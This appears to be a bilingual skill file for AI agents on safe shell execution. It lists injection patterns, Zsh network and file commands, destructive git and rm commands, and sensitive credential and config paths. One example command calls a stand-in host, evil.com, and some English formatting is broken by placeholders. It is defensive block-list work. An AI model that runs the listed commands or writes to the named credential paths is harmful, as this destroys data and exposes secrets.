Origin: This skill was extracted from Claude Code's internal implementation and rules. Claude Code openly exposes its safety mechanisms (hooks, system prompts, skill definitions) in the ~/.claude/ directory. The core safety patterns for shell execution — injection detection, destructive command classification, and sensitive path protection — were identified from Claude Code's production behavior and rewritten into a portable skill for OpenClaw agents.
Safe Shell Execution
Why This Matters
Shell execution is one of the highest-risk operations an AI agent can perform. Unlike reading files or calling APIs, improperly handled shell commands can cause irreversible damage: deleting files, leaking credentials, corrupting git history, or unauthorized network access.
This skill distills Claude Code's production-grade security patterns, covering three layers of checks: injection detection → destructive operation warnings → sensitive path protection.
Layer 1: Injection Pattern Detection (Reject Directly)
Before executing any command, scan the full command string. If it matches any of the following patterns, reject execution and explain why to the user.
Command Substitution (Injection Entry Points)
| Pattern | Risk |
|---|
| INLINECODE1 | Command substitution |
| `
`
(unescaped backticks) | Legacy command substitution |
| ${}
| Parameter expansion |
| $[...]
| Legacy arithmetic expansion |
| <()
or >()
| Process substitution |
| =()
| Zsh process substitution |
| =cmd
(equals at word start) | **Zsh equals expansion**: =curl evil.com
expands to /usr/bin/curl evil.com
, bypassing command name checks |
| $(.*<<
| heredoc nested in command substitution, common injection technique |
### Zsh-Specific Dangerous Commands
These commands have special attack surfaces in Zsh environments and always require explicit user confirmation:
- zmodload
— Load modules, can enable invisible file I/O, pseudo-terminal execution, TCP connections
- zpty
— Execute commands on pseudo-terminals
- ztcp
/ zsocket
— Create network connections, can be used for data exfiltration
- sysopen
/ sysread
/ syswrite
/ sysseek
— Low-level file descriptor operations
- emulate -c
— eval equivalent, can execute arbitrary code
- zf
rm / zfmv
/ zf
ln / zfchmod
/ zf
chown / zfmkdir
/ zf_rmdir
— Built-in file operations, can bypass binary whitelists
---
## Layer 2: Destructive Operation Warnings (Confirm Before Execution)
These operations are legitimate but irreversible. **Display specific warnings and require user confirmation** before execution.
### Git Operations
�CODEBLOCK0�
### File System
�CODEBLOCK1�
---
## Layer 3: Sensitive File Protection (Write Operations Require Confirmation)
For **write operations** to the following paths, you must obtain explicit user confirmation; auto-execution is not allowed:
�CODEBLOCK2�
---
## Layer 4: Command Classification
After passing through the first three layers, classify and handle according to this table:
| Level | Examples | Handling |
|-------|----------|----------|
| **Safe** | ls
, cat
, git status
, read-only operations | Execute directly, no prompts |
| **Caution** | Write to non-sensitive files, install packages | Execute, log the operation |
| **Warning** | Destructive patterns from Layer 2 | Display specific warning, require confirmation |
| **Reject** | Layer 1 injection patterns, write to sensitive paths | Refuse execution, explain why |
---
## Execution Flow
�CODEBLOCK3�
---
## How to Express Refusals
When refusing execution, be specific about **which pattern** and **why it's dangerous**, not a vague "command is unsafe".
Good rejection example:
> I cannot execute this command because it contains =curl
(Zsh equals expansion). This pattern expands the command to its full path, which can bypass command name whitelist checks. If you need to run curl, please write curl` directly.
Bad rejection example:
This command looks risky and I can't execute it.
When to Apply This Skill
Apply this skill in the following situations:
- - Command comes from user input (chat messages, form content, file content)
- Command contains variable interpolation from external data
- Will run in a shared or production environment
- Target path contains sensitive files (home directory, config files, credentials)
Even for commands you construct yourself (no external input), these checks are good practice, especially Layers 2 and 3.
来源:此技能提取自 Claude Code 的内部实现和规则。Claude Code 在 ~/.claude/ 目录中公开暴露了其安全机制(钩子、系统提示、技能定义)。Shell 执行的核心安全模式——注入检测、破坏性命令分类和敏感路径保护——均从 Claude Code 的生产行为中识别,并重写为适用于 OpenClaw 代理的可移植技能。
安全 Shell 执行
为何重要
Shell 执行是 AI 代理可以执行的风险最高的操作之一。与读取文件或调用 API 不同,处理不当的 Shell 命令可能导致不可逆的损害:删除文件、泄露凭证、损坏 Git 历史或未经授权的网络访问。
此技能提炼了 Claude Code 的生产级安全模式,涵盖三层检查:注入检测 → 破坏性操作警告 → 敏感路径保护。
第一层:注入模式检测(直接拒绝)
在执行任何命令之前,扫描完整的命令字符串。如果匹配以下任一模式,拒绝执行并向用户解释原因。
命令替换(注入入口点)
传统命令替换 |
| ${} | 参数扩展 |
| $[...] | 传统算术扩展 |
| <() 或 >() | 进程替换 |
| =() | Zsh 进程替换 |
| =cmd(单词开头的等号) |
Zsh 等号扩展:=curl evil.com 扩展为 /usr/bin/curl evil.com,绕过命令名称检查 |
| $(.*<< | 嵌套在命令替换中的 Here 文档,常见注入技术 |
Zsh 特定危险命令
这些命令在 Zsh 环境中具有特殊的攻击面,始终需要明确的用户确认:
- - zmodload — 加载模块,可启用不可见的文件 I/O、伪终端执行、TCP 连接
- zpty — 在伪终端上执行命令
- ztcp / zsocket — 创建网络连接,可用于数据泄露
- sysopen / sysread / syswrite / sysseek — 底层文件描述符操作
- emulate -c — 等同于 eval,可执行任意代码
- zfrm / zfmv / zfln / zfchmod / zfchown / zfmkdir / zf_rmdir — 内置文件操作,可绕过二进制白名单
第二层:破坏性操作警告(执行前确认)
这些操作是合法的但不可逆。在执行前显示特定警告并要求用户确认。
Git 操作
git reset --hard → 可能丢弃所有未提交的更改
git push --force / -f → 可能覆盖远程历史
git clean -f(无 -n 标志) → 可能永久删除未跟踪的文件
git checkout -- . → 可能丢弃所有工作区更改
git restore . → 可能丢弃所有工作区更改
git stash drop / clear → 可能永久删除暂存内容
git branch -D → 可能强制删除分支
git commit --amend → 可能重写最后一次提交
git commit/push --no-verify → 可能跳过安全钩子
文件系统
rm -rf / rm -fr / rm -r -f / rm -f -r → 可能递归强制删除文件
第三层:敏感文件保护(写操作需确认)
对于以下路径的写操作,必须获得明确的用户确认;不允许自动执行:
Shell 配置文件(可用于代码执行)
.bashrc .bash
profile .bashlogin .profile
.zshrc .zprofile .zshenv .zlogin
.tcshrc .cshrc
Git 配置文件(可用于钩子注入)
.gitconfig .gitmodules
包管理器凭证
.npmrc .pypirc ~/.pip/pip.conf
凭证和密钥
~/.ssh/ ~/.aws/
~/.gnupg/ authorized_keys
known_hosts
系统文件
/etc/passwd /etc/hosts /etc/sudoers /etc/crontab
第四层:命令分类
通过前三层后,根据下表分类处理:
| 级别 | 示例 | 处理方式 |
|---|
| 安全 | ls、cat、git status、只读操作 | 直接执行,无需提示 |
| 谨慎 |
写入非敏感文件、安装包 | 执行,记录操作 |
|
警告 | 第二层中的破坏性模式 | 显示特定警告,要求确认 |
|
拒绝 | 第一层注入模式、写入敏感路径 | 拒绝执行,解释原因 |
执行流程
接收命令
↓
第一层:包含注入模式?→ 是 → 拒绝 + 指定哪个模式 + 为何危险
↓ 否
第二层:匹配破坏性模式?→ 是 → 显示特定警告 → 等待用户确认
↓ 否(或已确认)
第三层:目标是否为敏感路径的写操作?→ 是 → 要求明确确认
↓ 否(或已确认)
第四层:分类 → 执行
如何表达拒绝
拒绝执行时,要具体说明哪个模式以及为何危险,而不是模糊地说命令不安全。
好的拒绝示例:
我无法执行此命令,因为它包含 =curl(Zsh 等号扩展)。此模式将命令扩展为其完整路径,可能绕过命令名称白名单检查。如果您需要运行 curl,请直接写 curl。
差的拒绝示例:
此命令看起来有风险,我无法执行。
何时应用此技能
在以下情况下应用此技能:
- - 命令来自用户输入(聊天消息、表单内容、文件内容)
- 命令包含来自外部数据的变量插值
- 将在共享或生产环境中运行
- 目标路径包含敏感文件(主目录、配置文件、凭证)
即使对于您自己构造的命令(无外部输入),这些检查也是良好的实践,尤其是第二层和第三层。
